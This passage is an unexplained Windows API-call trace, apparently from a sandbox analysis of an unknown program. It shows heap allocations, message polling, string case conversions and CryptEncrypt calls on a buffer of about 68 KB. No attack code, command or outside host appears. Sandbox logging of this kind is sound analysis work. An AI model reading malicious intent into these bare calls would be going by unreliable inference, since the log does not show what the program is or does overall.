(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0206.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.118] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0206.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0206.119] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0206.119] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0206.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0206.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.119] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0206.120] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0206.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0206.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0206.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0206.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0206.120] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab40 [0206.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0206.121] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0206.121] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.121] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0206.121] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0c58 | out: hHeap=0x2af0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0206.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab068, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.125] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x10c08, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x10c10) returned 1 [0206.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.125] CharLowerBuffW (in: lpsz="byte[68624]", cchLength=0xb | out: lpsz="byte[68624]") returned 0xb [0206.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.126] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.127] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.127] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.127] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.127] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.127] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d0c58*, pdwDataLen=0x8cef60*=0x10c08, dwBufLen=0x10c10 | out: pbData=0x37d0c58*, pdwDataLen=0x8cef60*=0x10c10) returned 1 [0206.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.130] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.130] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.130] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.130] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.130] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.130] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.130] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.130] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.130] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.130] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.130] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.130] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 